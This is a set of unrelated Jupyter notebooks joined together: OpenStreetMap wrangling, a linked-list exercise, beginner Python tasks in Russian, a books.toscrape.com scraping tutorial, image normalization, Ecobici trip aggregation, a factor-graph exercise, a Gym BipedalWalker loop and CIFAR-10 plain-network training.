{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u'DAIMARU Peacock'}
{u'Count': 9, u'City': u'hoodi', u'Supermarket': u'Reliance Fresh'}
{u'Count': 9, u'City': u'hoodi'}
{u'Count': 6, u'City': u'hoodi', u'Supermarket': u"Nilgiri's"}
{u'Count': 3, u'City': u'hoodi', u'Supermarket': u'Royal Mart Supermarket'}
{u'Count': 3, u'City': u'hoodi', u'Supermarket': u'Safal'}
# -
# These are few common supermarket brands in both the cities
# And Nilgiris is like 500 meters away from my home.
# <hr>
# ## **4. Conclusion**<a name="conclusion"></a>
# After such a investigation on this data i think i have become familiar with bunkyo region.
#
# I was expecting a difficulty in merging both the cities data into a single database ,but seem a simple key like city could differentiate them.
#
# There might be even robust cleaning algorithms to a better and clean database,as most of the data is from gps that goes into OpenStreetMap.org. Which needed to be regularly cleaned.
#
# From the comparison of the two cities, they are quite similar, and the Bunkyo region interests me even more as a place to pursue higher studies.
# <hr>
|
P3 wrangle_data/.ipynb_checkpoints/DataWrangling_ganga-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Linked List Reversal
#
# ## Problem
#
# Write a function to reverse a Linked List in place. The function will take in the head of the list as input and return the new head of the list.
#
# You are given the example Linked List Node class:
class Node(object):
    """A node in a singly linked list."""
    def __init__(self,value):
        self.value = value  # payload stored at this node
        self.nextnode = None  # reference to the next Node; None marks the tail
# # Solution
#
# Fill out your solution below:
def reverse(head):
    """Reverse a singly linked list in place.

    Walks the list once, re-pointing each node's ``nextnode`` at its
    predecessor.

    Parameters
    ----------
    head : Node or None
        First node of the list (``None`` for an empty list).

    Returns
    -------
    Node or None
        The new head (the original tail), or ``None`` for an empty list.
    """
    # Fixed: removed the unreachable ``pass`` after ``return`` and the
    # uninformative "# watch out" comments from the original.
    prev = None
    current = head
    while current:
        # Remember the rest of the list before cutting the forward link.
        nxt = current.nextnode
        current.nextnode = prev
        prev = current
        current = nxt
    # When current falls off the end, prev is the old tail == new head.
    return prev
# # Test Your Solution
#
# **Note, this isn't a classic run cell for testing your solution, please read the statements below carefully**
#
# You should be able to easily test your own solution to make sure it works. Given the short list a,b,c,d with values 1,2,3,4. Check the effect of your reverse function and make sure the results match the logic here below:
# +
# Create a list of 4 nodes
# Create a list of 4 nodes
a = Node(1)
b = Node(2)
c = Node(3)
d = Node(4)
# Set up order a,b,c,d with values 1,2,3,4
a.nextnode = b
b.nextnode = c
# d is the tail: its nextnode stays None (set in Node.__init__).
c.nextnode = d
# -
# Now let's check the values of the nodes coming after a, b and c:
# Print the successor of each node to confirm the forward order 1->2->3->4.
print (a.nextnode.value)
print (b.nextnode.value)
print (c.nextnode.value)
# NOTE(review): d is the tail, so d.nextnode is None and this expression
# raises AttributeError — the narrative below suggests this is intentional
# (demonstrating there is nothing after the last node); confirm.
d.nextnode.value
# So far so good. Note how there is no value following the last node, which makes sense! Now let's reverse the linked list, we should see the opposite order of values!
# Reverse the list: ``d`` becomes the new head and ``a`` the tail.
reverse(a)
print (d.nextnode.value)
print (c.nextnode.value)
print (b.nextnode.value)
# Fixed: the original used Python 2 print-statement syntax here, which is a
# SyntaxError under this notebook's Python 3 kernel.  The call still raises
# AttributeError at runtime (a.nextnode is now None), as the comment expects.
print(a.nextnode.value)  # This will give an error since it now points to None
# Great, now we can see that each of the values points to its previous value (although now that the linked list is reversed we can see the ordering has also reversed)
#
# ## Good Job!
|
code/algorithms/course_udemy_1/Linked Lists/Problems - PRACTICE/Linked List Reversal .ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# #### Задача 1.
# ##### Даны два целых числа A и В. Выведите все числа от A до B включительно,
# #### в порядке возрастания, если A < B, или в порядке убывания в противном случае.
# **Вход:**
#
# 1
# 10
#
# **Выход:**
#
# 1 2 3 4 5 6 7 8 9 10
#
#
# **Вход:**
#
# 10
# 1
#
# **Выход:**
#
# 10 9 8 7 6 5 4 3 2 1
# Read two integers and print every value from A to B inclusive,
# counting up when A < B and counting down otherwise.
A = int(input())
B = int(input())
step = 1 if A < B else -1
print(*range(A, B + step, step))
# #### Задача 2.
# #### Дано несколько чисел. Посчитайте, сколько из них равны нулю, и выведите это количество.
# **Вход:**
#
# 5 0 7 0 2 2
#
# **Выход:**
#
# 2
#
# +
# Read a whitespace-separated line of integers and count the zeros.
numbers = map(int, input().split())
zero_count = sum(1 for value in numbers if value == 0)
print(zero_count)
# -
# Same task in one pass: count how many of the input integers equal zero.
values = list(map(int, input().split()))
print(values.count(0))
# #### Задача 3.
# ### Найдите и выведите все двузначные числа, которые равны удвоенному произведению своих цифр.
print(*[x for x in range(10, 100) if x == (x // 10) * (x % 10) * 2])
# #### Задача 4.
# По данному натуральном n вычислите сумму $1!+2!+3!+...+n!$. В решении этой задачи можно использовать только один цикл.
# *Тест1*
# **Вход:**
#
# 1
#
# **Выход:**
#
# 1
#
#
#
# *Тест2*
# **Вход:**
#
# 2
#
# **Выход:**
#
# 3
#
#
#
#
#
# *Тест3*
# **Вход:**
#
# 3
#
# **Выход:**
#
# 9
#
# +
# Read n and print the sum 1! + 2! + ... + n!, building each factorial
# incrementally so only one loop is needed.
n = int(input())
s = 0
fact = 1
for x in range(1, n + 1):
    fact *= x
    s += fact
# Fixed: print only the sum.  The original printed ``fact, s`` (e.g. "2 3"
# for n=2), but the task's expected output for n=2 is just "3".
print(s)
# -
# **Задача 5**. Найдите максимальный элемент и его позицию в последовательности чисел, записанных через пробел.
# +
# Find the maximum value and the index of its first occurrence.
numbers = list(map(int, input().split()))
best = max(numbers)
# list.index returns the first occurrence, matching a strict ">" scan.
print(best, numbers.index(best))
# -
# #### Задача 6.
# Дано целое положительное число N. Составьте таблицу умножения для чисел от 2 до N включительно.
# **Вход:**
#
# 4
#
# **Выход:**
#
# 2*1=2
# 2*2=4
# 2*3=6
# 2*4=8
# 2*5=10
# 2*6=12
# 2*7=14
# 2*8=16
# 2*9=18
# 2*10=20
#
# 3*1=3
# 3*2=6
# 3*3=9
# 3*4=12
# 3*5=15
# 3*6=18
# 3*7=21
# 3*8=24
# 3*9=27
# 3*10=30
#
# 4*1=4
# 4*2=8
# 4*3=12
# 4*4=16
# 4*5=20
# 4*6=24
# 4*7=28
# 4*8=32
# 4*9=36
# 4*10=40
#
# +
# Multiplication tables for 2..N, each followed by a blank line.
n = int(input())
for factor in range(2, n + 1):
    table = '\n'.join(f'{factor}*{m}={factor * m}' for m in range(1, 11))
    print(table)
    print()
# -
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_sequence(s):
    """Return True if every bracket in *s* is matched and properly nested.

    Supports (), [] and {}; other characters are ignored.
    """
    # Fixed: the original draft did not parse (missing ``or`` in the
    # condition, ``append.lst`` instead of ``lst.append`` and a dangling
    # ``elif``) and never performed any matching.
    closers = {')': '(', ']': '[', '}': '{'}
    stack = []
    for ch in s:
        if ch in '([{':
            stack.append(ch)
        elif ch in closers:
            # A closer must pair with the most recent unmatched opener.
            if not stack or stack.pop() != closers[ch]:
                return False
    # Balanced only if no opener is still waiting for its partner.
    return not stack
print(check_sequence(s))
# +
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_sequence(s):
    """Return True if the bracket sequence *s* is balanced, else False."""
    # Fixed: the original returned ``True or False`` (i.e. always True) on
    # its first line, leaving the matching logic below unreachable and
    # mis-indented outside the function.
    my_stack = []
    my_dict = {'}': '{', ')': '(', ']': '['}
    for symbol in s:
        if symbol in my_dict.values():
            # Opening bracket: wait for its closing partner.
            my_stack.append(symbol)
        else:
            # Closing bracket: it must match the most recent opener.
            if len(my_stack) > 0 and my_stack[-1] == my_dict[symbol]:
                my_stack.pop()
            else:
                return False
    # Balanced only if every opener found its partner.
    return len(my_stack) == 0
check_sequence(s)
# -
# Библиотека Scrapy
# +
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_seq(s):
    """Return True when the brackets in *s* are balanced and well nested."""
    close_to_open = {'}': '{', ']': '[', ')': '('}
    pending = []
    for ch in s:
        if ch in close_to_open.values():
            # Opening bracket: remember it until its partner arrives.
            pending.append(ch)
        elif pending and pending[-1] == close_to_open[ch]:
            # Closer matches the most recent opener: resolve the pair.
            pending.pop()
        else:
            # Empty stack on a closer, or wrong nesting order.
            return False
    return not pending
check_seq(s)
# -
|
for_tasks_solved.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction to web scraping with python
# [source](https://dev.to/lewiskori/introduction-to-web-scraping-with-python-24li)
# ## What is web scraping?
#
# This is the process of extracting information from a webpage by taking advantage of patterns in the web page's underlying code.
#
# We can use web scraping to gather unstructured data from the internet, process it and store it in a structured format.
#
# In this walkthrough, we'll be storing our data in a JSON file.
# ## Alternatives to web scraping
#
# Though web scraping is a useful tool in extracting data from a website, it's not the only means to achieve this task.
#
# Before starting to web scrape, find out if the page you seek to extract data from provides an API.
# ## robots.txt file
#
# Ensure that you check the robots.txt file of a website before making your scrapper. This file tells if the website allows scraping or if they do not.
#
# To check for the file, simply type the base URL followed by "/robots.txt"
# An example is, "mysite.com/robots.txt".
#
# For more about robots.txt files click [here](https://varvy.com/robottxt.html).
# ## Getting started
#
# In this tutorial, we'll be extracting data from [books to scrape](http://books.toscrape.com/) which you can use to practise your web scraping.
#
# We'll extract the title, rating, link to more information about the book and the cover image of the book. Code can be found on [GitHub](https://github.com/lewis-kori/webcrawler-tutorial).
# ### Importing libraries
#
# The python libraries perform the following tasks.
#
# * requests - will be used to make Http requests to the webpage.
# * json - we'll use this to store the extracted information to a JSON file.
# * BeautifulSoup - for parsing HTML.
import requests
import json
from bs4 import BeautifulSoup
# ### walkthrough
#
# We're initializing three variables here.
#
# * header-HTTP headers provide additional parameters to HTTP transactions. By sending the appropriate HTTP headers, one can access the response data in a different format.
# * base_url - is the webpage we want to scrape since we'll be needing the URL quite often, it's good to have a single initialization and reuse this variable going forward.
# * r - this is the response object returned by the get method. Here, we pass the base_url and header as parameters.
# +
# Spoof a desktop-browser User-Agent so the site serves the normal HTML page.
header = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'}
# Site root; reused below to turn relative hrefs/srcs into absolute URLs.
base_url = "http://books.toscrape.com/"
# Response object for the landing page; parsed in the next cell.
r = requests.get(base_url, headers=header)
# -
# To ensure our scraper runs when the http response is ok we'll use the if statement as a check. The number 200 is the status code for Ok. To get a list of all codes and their meanings [check out this resource](https://www.restapitutorial.com/httpstatuscodes.html).
#
# We'll then parse the response object using the BeautifulSoup method and store the new object to a variable called soup.
# Only scrape when the landing page loaded successfully (HTTP 200).
if r.status_code == 200:
    soup = BeautifulSoup(r.text, 'html.parser')
    # Each book card is a <li> carrying this Bootstrap grid class string.
    books = soup.find_all('li',attrs={"class":"col-xs-6 col-sm-4 col-md-3 col-lg-3"})
    result=[]
    for book in books:
        title=book.find('h3').text
        # hrefs in the page are relative, so prefix the site root.
        link=base_url +book.find('a')['href']
        # Star rating = number of <i class="icon-star"> icons in the card.
        stars = str(len(book.find_all('i',attrs= {"class":"icon-star"}))) + " out of 5"
        # [2:] skips the two leading characters before the digits —
        # presumably the currency symbol plus an encoding artifact; confirm.
        price="$"+book.find('p',attrs={'class':'price_color'}).text[2:]
        picture = base_url + book.find('img')['src']
        single ={'title':title,'stars':stars,'price':price,'link':link,'picture':picture}
        result.append(single)
    # Persist all scraped records as pretty-printed JSON.
    with open('books.json','w') as f:
        json.dump(result,f,indent=4)
else:
    # Anything other than 200: just report the status code.
    print(r.status_code)
# +
import pandas as pd
# Load the freshly written scrape results back into a DataFrame for a peek.
df = pd.read_json('books.json')
df.head()
# -
# Let's take a look at a single record from our webpage to identify the patterns. Once we can see the page, we'll loop through every record in the page as they contain similar traits.
#
# 
# From the image above, we'll notice that all books are contained within a list item with the class.
#
# ```
# col-xs-6 col-sm-4 col-md-3 col-lg-3
# ```
#
# By using the ```find_all()``` method, we can find all references of this HTML tag in the webpage. we pass the tag as the first argument and then using the attrs argument which takes in a python dictionary, we can specify attributes of the HTML tag selected. In this case, it was a class indicated above, but you can even use id as an attribute.
#
# Store the result in a variable, I chose the name books.
# NOTE(review): these demonstration lines reuse ``book`` left over from the
# loop in the scraping cell above; run that cell first or this raises NameError.
title = book.find('h3').text
link = base_url + book.find('a')['href']
# If we observe keenly, we'll notice that each of the elements we want to extract is nested within the list item tag are all contained in similar tags, in the example above. The title of the book is between ```h3``` tags.
#
# The ```find()``` method returns the first matching tag.
#
# ```text``` will simply return any text found within the tags specified.
#
# For the anchor tags, we'll be extracting the hyper reference link.
#
# As opposed to ```h3``` tag, the ```href``` element is within anchor tags in HTML. Like so:
#
# ```html
# <a href="somelink.com"></a>
# ```
#
# In this case, the returned object will behave like a dictionary where we have a
#
# ```
# dictionary_name[key]
# ```
#
# We do this iteratively for all the values we seek to extract because we are taking advantage of the pattern in the underlying code of the webpage. Hence the use of the python for loop.
#
# The extracted elements are then stored in respective variables which we'll put in a dictionary. With this information, we can then comfortably append the dictionary object to the initialized result list set before our for loop.
#
# ```python
# single ={'title':title,'stars':stars,'price':price,'link':link,'picture':picture}
# result.append(single)
# with open('books2.json','w') as f:
# json.dump(result,f,indent=4)
# ```
#
# Finally, store the python list in a JSON file by the name "books.json" with an indent of 4 for readability purposes.
|
_site/lectures/Week 06 - Web Scraping/01. Introduction to Web Scraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
"""
MAC0417 - EP2
Nome: <NAME>
NUSP: 9763832
IMPORTANTE: apenas a função de normalização foi implementada. As funções de
criação dos histogramas NÃO foram implementadas. Não consegui terminá-las a tempo
A execução das funções foi feita baseada na seguinte árvore de diretórios:
analysis_functions.ipynb
augmentedDataset/
|---- exp/
|---- <imagens com aplicação da exponencial>
grey/
|---- <imagens convertidas de RGB para escalas de cinza>
log/
|---- <imagens com aplicação do logaritmo>
mean/
|---- <imagens com aplicação do filtro da média>
sum/
|---- <imagens com aplicação do gradiente>
normalizedDataset/
|---- <imagens com aplicação da normalização>
"""
from os import listdir
from skimage import io
from skimage import exposure
# File names of each augmented variant of the dataset.
grey_imgs = listdir("augmentedDataset/grey/")
sum_imgs = listdir("augmentedDataset/sum/")
log_imgs = listdir("augmentedDataset/log/")
exp_imgs = listdir("augmentedDataset/exp/")
mean_imgs = listdir("augmentedDataset/mean/")
# Takes the names of the greyscale images and applies
# normalization via histogram equalization.
def normalize_with_equalization(imgs, folder):
    """Equalize the histogram of every image in augmentedDataset/<folder>/
    and save the result under normalizedDataset/<folder>/ with a
    "_normalizado" filename suffix."""
    for name in imgs:
        img = io.imread("augmentedDataset/" + folder + "/" + name)
        norm_img = exposure.equalize_hist(img)
        new_name = name.replace(".jpg", "_normalizado.jpg")
        io.imsave("normalizedDataset/" + folder + "/" + new_name, norm_img)
# Create the normalized images for every augmented variant.
normalize_with_equalization(grey_imgs, "grey")
normalize_with_equalization(sum_imgs, "sum")
normalize_with_equalization(log_imgs, "log")
normalize_with_equalization(exp_imgs, "exp")
normalize_with_equalization(mean_imgs, "mean")
|
EP2/analysis_functions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: env_calidad_aire
# language: python
# name: env_calidad_aire
# ---
# # Procesamiento de viajes de Ecobici
# __Descripción:__
#
# Se obtiene el AGEB de origen y destino de los viajes de los viajes de ecobici y se obtiene el agregado primedio de los viajes entre AGEBS por hora.
#
# __Input__
#
# - Estaciones de ecobici: Estaciones de ecobici con clave AGEB obtenida de __Uber © 2019 Copyright Uber Technologies, Inc.Data Attributions__
#
# - <NAME> 2019
# Responsable: Ecobici
#
#
import pandas as pd
# ## Estaciones
# +
df_estaciones = pd.read_csv('../data/SIG/procesado/CSV/estaciones-de-ecobici_con_AGEB.csv',sep=',')
# Keep only the digits of the AGEB key, then cast to int for joining below.
df_estaciones['CVE_AGEB'] = [''.join(filter(lambda x: x.isdigit(), row)) for row in df_estaciones['CVE_AGEB']]
df_estaciones['CVE_AGEB'] = df_estaciones['CVE_AGEB'].astype(int)
df_estaciones.sort_values("ID").head(5)
# -
# ## Prueba
# + active=""
# set(df_estaciones["ID"]) - set(df_viajes["Ciclo_Estacion_Arribo"])
# -
# ## Viajes ecobici
df_viajes = pd.read_csv('../data/ecobici/ecobici_2019.csv',sep=',')
df_viajes.head()
# ### merge viajes e info de estaciones
#
# Get the AGEB for the origin and destination station of each trip.
# #### Clave AGEB retiro
# Attach AGEB key and station name of the *departure* (retiro) station.
df_viajes_ageb = df_viajes.merge(df_estaciones[['ID','CVE_AGEB',"Nombre"]], left_on='Ciclo_Estacion_Retiro', right_on='ID')
df_viajes_ageb.rename(columns={'CVE_AGEB': 'CVE_AGEB_retiro'}, inplace=True)
df_viajes_ageb.head()
# #### Clave AGEB destino
# Attach AGEB key and station name of the *arrival* (arribo) station.
df_viajes_ageb = df_viajes_ageb.merge(df_estaciones[['ID','CVE_AGEB',"Nombre"]], left_on='Ciclo_Estacion_Arribo', right_on='ID')
df_viajes_ageb.rename(columns={'CVE_AGEB': 'CVE_AGEB_arribo'}, inplace=True)
df_viajes_ageb.head()
# ## Rename the station-name columns produced by the two merges:
df_viajes_ageb.rename({"Nombre_x":"nombre_estacion_retiro","Nombre_y":"nombre_estacion_arribo"},axis=1,inplace=True)
df_viajes_ageb.head()
# ### Drop unused columns
df_viajes_ageb.columns
df_viajes_ageb.drop(['Unnamed: 9','ID_x','ID_y'], axis=1, inplace=True)
df_viajes_ageb.head()
df_viajes_ageb[df_viajes_ageb["CVE_AGEB_retiro"]==118]
# ## Obtenemos la columna de hora de retiro:
# Hour of departure as an integer 0-23 (everything before the first ':').
df_viajes_ageb['Hora_Retiro_round'] = df_viajes_ageb['Hora_Retiro'].str.split(':').str[0].astype(int)
df_viajes_ageb.head()
# ## Compute the duration of each trip:
# Drop rows with formatting errors:
df_viajes_ageb[df_viajes_ageb['Hora_Retiro']=='18::']
index_number = df_viajes_ageb[df_viajes_ageb['Hora_Retiro']=='18::'].index.values[0]
df_viajes_ageb.drop([index_number],inplace=True)
# Convert to datetime:
# +
df_viajes_ageb['Hora_Retiro'] = pd.to_datetime(df_viajes_ageb['Hora_Retiro'], format='%H:%M:%S')
df_viajes_ageb['Hora_Arribo'] = pd.to_datetime(df_viajes_ageb['Hora_Arribo'], format='%H:%M:%S')
# -
# Verify that arrival and departure times are datetime,
# then subtract the columns to get the elapsed time.
df_viajes_ageb['duracion_viaje'] = df_viajes_ageb['Hora_Arribo'] - df_viajes_ageb['Hora_Retiro']
# NOTE(review): this keeps only the minutes field of the timedelta string
# ("0 days HH:MM:SS" -> MM), so any hours component is discarded —
# presumably acceptable for short bike-share trips; confirm.
df_viajes_ageb['duracion_viaje_minutos'] = df_viajes_ageb['duracion_viaje'].astype('str').str.split(':').str[1].astype(int)
df_viajes_ageb.head()
df_viajes_ageb.drop(['Bici','Fecha_Arribo',
                     'Fecha_Retiro','duracion_viaje','Hora_Arribo','Hora_Retiro'], axis=1, inplace=True)
df_viajes_ageb.head()
# ### Estos datos se usaran para obtener los viajes de una estación a otra por ageb.
df_viajes_ageb.to_csv('../data/procesado/datos_ecobici_por_ageb.csv',index=False)
df_viajes_ageb.head()
# ### Gender of the user for each trip:
# One-hot flags so gender counts can be summed during the later groupby.
df_viajes_ageb['Genero_Usuario_F'] = pd.get_dummies(df_viajes_ageb['Genero_Usuario'])["F"]
df_viajes_ageb['Genero_Usuario_M'] = pd.get_dummies(df_viajes_ageb['Genero_Usuario'])["M"]
# Sanity check: number of distinct origin/destination AGEBs.
print(df_viajes_ageb['CVE_AGEB_retiro'].nunique(),df_viajes_ageb['CVE_AGEB_arribo'].nunique())
df_viajes_ageb.head()
print(df_viajes_ageb['CVE_AGEB_retiro'].nunique(),df_viajes_ageb['CVE_AGEB_arribo'].nunique())
# ## Definimos periodos del día para non graficar todas las horas:
# +
def periodo_hora(row):
    """Map an hour of day (0-23) to its 3-hour period label.

    Returns None for hours outside the defined periods (1-6), so those
    rows can be dropped with ``dropna``.
    """
    period_hours = {
        "7-10": (7, 8, 9),
        "10-13": (10, 11, 12),
        "13-16": (13, 14, 15),
        "16-19": (16, 17, 18),
        "19-22": (19, 20, 21),
        "22-1": (22, 23, 0),
    }
    for label, hours in period_hours.items():
        if row in hours:
            return label
    return None
# Bin every trip's departure hour; hours 1-6 map to None and are dropped.
df_viajes_ageb["Hora_Retiro_bin"] = df_viajes_ageb["Hora_Retiro_round"].apply(periodo_hora)
df_viajes_ageb = df_viajes_ageb.dropna()
# -
# Aggregate trips between AGEB pairs per time bin: trip count, mean rider
# age, duration statistics and gender totals.
df_viajes_ageb_agg = df_viajes_ageb.groupby(['CVE_AGEB_arribo','CVE_AGEB_retiro','Hora_Retiro_bin' ]).agg({'Edad_Usuario':['count', 'mean'],
                                                            'duracion_viaje_minutos':['mean','min','max'],
                                                            'Genero_Usuario_F':['sum'],
                                                            'Genero_Usuario_M':['sum'],
                                                           }).reset_index(drop=False)
# Flatten the MultiIndex columns into single underscore-joined names.
df_viajes_ageb_agg.columns = ['_'.join(col) for col in df_viajes_ageb_agg.columns]
df_viajes_ageb_agg.head(5)
# Definimos una función para obtener el número de mujeres y de hombres:
def procentaje_homvres(row):
    """Return the men's share of riders for this group on a 0-10 scale."""
    hombres = row['Genero_Usuario_M_sum']
    mujeres = row['Genero_Usuario_F_sum']
    # Same formula as before: men * 10 / total riders, rounded to 0 decimals.
    return round(hombres * 10 / (mujeres + hombres), 0)
df_viajes_ageb_agg['porcentage_hombres'] = df_viajes_ageb_agg.apply(procentaje_homvres, axis=1)
# Women's share is the complement on the same 0-10 scale.
df_viajes_ageb_agg['porcentage_mujeres'] = 10 - df_viajes_ageb_agg['porcentage_hombres']
df_viajes_ageb_agg.head()
df_viajes_ageb_agg.to_csv('../data/production_data/viajes_ecobici.csv',index=False)
# Sanity check the round trip: re-read the exported CSV and inspect one AGEB.
df = pd.read_csv("../data/production_data/viajes_ecobici.csv")
df[df["CVE_AGEB_retiro_"]==118]
|
jupyter_notebooks/procesamiento_datos_ecobici.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.5.2
# language: julia
# name: julia-1.5
# ---
# # Factor Graphs
#
# - **[1]** Consider the following state-space model:
# $$\begin{align*}
# z_k &= A z_{k-1} + w_k \\
# x_k &= C z_k + v_k
# \end{align*}$$
# where $k=1,2,\ldots,n$ is the time step counter; $z_k$ is an *unobserved* state sequence; $x_k$ is an *observed* sequence; $w_k \sim \mathcal{N}(0,\Sigma_w)$ and $v_k \sim \mathcal{N}(0,\Sigma_v)$ are (unobserved) state and observation noise sequences respectively; $z_0 \sim \mathcal{N}(0,\Sigma_0)$ is the initial state and $A$, $C$, $\Sigma_v$,$\Sigma_w$ and $\Sigma_0$ are known parameters. The Forney-style factor graph (FFG) for one time step is depicted here:
# <img src="./i/ffg-5SSB0-exam-Kalman-filter.png" style="width:500px;">
# (a) Rewrite the state-space equations as a set of conditional probability distributions.
# $$\begin{align*}
# p(z_k|z_{k-1},A,\Sigma_w) &= \ldots \\
# p(x_k|z_k,C,\Sigma_v) &= \ldots \\
# p(z_0|\Sigma_0) &= \ldots
# \end{align*}$$
# (b) Define $z^n \triangleq (z_0,z_1,\ldots,z_n)$, $x^n \triangleq (x_1,\ldots,x_n)$ and $\theta=\{A,C,\Sigma_w,\Sigma_v\}$. Now write out the generative model $p(x^n,z^n|\theta)$ as a product of factors.
# (c) We are interested in estimating $z_k$ from a given estimate for $z_{k-1}$ and the current observation $x_k$, i.e., we are interested in computing $p(z_k|z_{k-1},x_k,\theta)$. Can $p(z_k|z_{k-1},x_k,\theta)$ be expressed as a Gaussian distribution? Explain why or why not in one sentence.
# (d) Copy the graph onto your exam paper and draw the message passing schedule for computing $p(z_k|z_{k-1},x_k,\theta)$ by drawing arrows in the factor graph. Indicate the order of the messages by assigning numbers to the arrows.
# (e) Now assume that our belief about parameter $\Sigma_v$ is instead given by a distribution $p(\Sigma_v)$ (rather than a known value). Adapt the factor graph drawing of the previous answer so that it reflects our belief about $\Sigma_v$.
#
#
#
|
lessons/exercises/Exercises-Factor-Graphs.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Training an agent to Walk
# Now let us learn how to train a robot to walk using Gym along with some fundamentals.
# The strategy is that reward X points will be given when the robot moves forward and if the
# robot fails to move then Y points will be reduced. So the robot will learn to walk in the
# event of maximizing the reward.
#
# First, we will import the library, then we will create a simulation instance by make
# function.
#
#
# Open AI Gym provides an environment called BipedalWalker-v2 for training
# robotic agents in simple terrain.
import gym
# BipedalWalker-v3: a continuous-control walking task on simple terrain.
env = gym.make('BipedalWalker-v3')
# Then for each episode (Agent-Environment interaction between initial and final state), we
# will initialize the environment using reset method.
for episode in range(100):
    observation = env.reset()
    # Render the environment on each step
    for i in range(10000):
        env.render()
        # we choose action by sampling random action from environment's action space. Every environment has
        # some action space which contains the all possible valid actions and observations,
        action = env.action_space.sample()
        # Then for each step, we will record the observation, reward, done, info
        # NOTE(review): assumes the classic Gym API (4-tuple from step();
        # observation alone from reset()).  gym>=0.26 / gymnasium return
        # extra values — confirm the installed version.
        observation, reward, done, info = env.step(action)
        # When done is true, we print the time steps taken for the episode and break the current episode.
        if done:
            print("{} timesteps taken for the Episode".format(i+1))
            break
# The agent will learn by trial and error, and over a period of time it starts selecting actions that give the
# maximum rewards.
|
Chapter02/2.08 Training an Robot to Walk.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
import import_ipynb
from model import *
torch.cuda.set_device(3)
# +
# Standard CIFAR-10 training augmentation: random flip + 4-pixel-padded crop.
transform = transforms.Compose([transforms.RandomHorizontalFlip(),
                                transforms.RandomCrop(32, padding=4),
                                transforms.ToTensor()])
train_dataset = torchvision.datasets.CIFAR10(root='./data/',
                                             train=True,
                                             transform=transform,
                                             download=True)
# Test set gets no augmentation, only tensor conversion.
test_dataset = torchvision.datasets.CIFAR10(root='./data/',
                                            train=False,
                                            transform=transforms.ToTensor(),
                                            download=True)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
                                           batch_size=128,
                                           shuffle=True,
                                           num_workers=4)
# No shuffling for evaluation.
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
                                          batch_size=128,
                                          shuffle=False,
                                          num_workers=4)
# +
# For the result of resnets, see the document.
# Plain (non-residual) CIFAR nets of increasing depth; the commented-out
# ResNet group below is swapped in for the second experiment.
net1 = Plain20().to(device)
net2 = Plain32().to(device)
net3 = Plain44().to(device)
net4 = Plain56().to(device)
#net5 = ResNet20().to(device)
#net6 = ResNet32().to(device)
#net7 = ResNet44().to(device)
#net8 = ResNet56().to(device)
# -
net_group = [net1, net2, net3, net4]
#net_group = [net5, net6, net7, net8]
# +
def update_lr(optimizer, lr):
    """Set every parameter group of *optimizer* to the learning rate *lr*."""
    for group in optimizer.param_groups:
        group['lr'] = lr
total_step = len(train_loader)
train_error = []
test_error = []
# Train each network in turn and record its running train/test error curves.
for net in net_group:
    model_train_error = []
    model_test_error = []
    train_total = 0
    train_correct = 0
    test_total = 0
    test_correct = 0
    learning_rate=0.1
    num_epochs = 200
    criterion = nn.CrossEntropyLoss()
    # SGD settings follow the ResNet paper: lr 0.1, momentum 0.9, wd 1e-4.
    optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate, momentum=0.9, weight_decay=0.0001)
    # training
    iteration=0
    for epoch in range(num_epochs):
        for i, (images, labels) in enumerate(train_loader):
            images = images.to(device)
            labels = labels.to(device)
            output = net(images)
            loss = criterion(output, labels)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            iteration += 1
            _, predict = torch.max(output.data, 1)
            train_total += labels.size(0)
            # NOTE: despite the name, train_correct accumulates *mis*matches
            # (predict != labels), so 100*train_correct/train_total below is
            # the error rate — which is exactly what gets plotted.
            train_correct += (predict != labels).sum().item()
            # error evaluation
            if iteration % 300 == 0:
                model_train_error.append(100*train_correct/train_total)
                train_total = 0
                train_correct = 0
                # Measure test error without building autograd graphs.
                with torch.no_grad():
                    for j, (image, label) in enumerate(test_loader):
                        image = image.to(device)
                        label = label.to(device)
                        outputs = net(image)
                        _, prediction = torch.max(outputs.data, 1)
                        test_total += label.size(0)
                        # Same convention: counts mispredictions, not hits.
                        test_correct += (prediction != label).sum().item()
                    model_test_error.append(100*test_correct/test_total)
                    test_total = 0
                    test_correct = 0
        #debugging
        if (epoch+1) % 10 == 0:
            print ("Epoch [{}/{}], Loss: {:.4f}".format(epoch+1, num_epochs, loss.item()))
        # lr decay at 32k & 48k iter, according to the paper
        if epoch == 80 or epoch == 120:
            learning_rate /= 10
            update_lr(optimizer, learning_rate)
